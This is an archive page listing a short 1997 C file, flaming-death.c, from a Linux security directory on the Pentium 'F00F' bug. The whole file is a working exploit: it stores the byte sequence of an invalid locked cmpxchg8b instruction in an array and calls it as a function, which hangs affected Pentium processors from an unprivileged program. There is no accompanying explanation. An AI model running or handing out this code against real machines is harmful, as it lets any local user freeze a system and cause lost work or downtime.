home *** CD-ROM | disk | FTP | other *** search
/ linuxmafia.com 2016 / linuxmafia.com.tar / linuxmafia.com / pub / linux / security / f00f / flaming-death.c < prev    next >
C/C++ Source or Header  |  1997-11-09  |  160b  |  11 lines

  1. char x[5] = { 0xf0, 0x0f, 0xc7, 0xc8 };
  2.  
  3. int main(void)
  4. {
  5.         void (*f)(void) = (void (*)(void))x;
  6.         f();
  7.         /*NOTREACHED*/
  8.         return 0;
  9. }
  10.  
  11.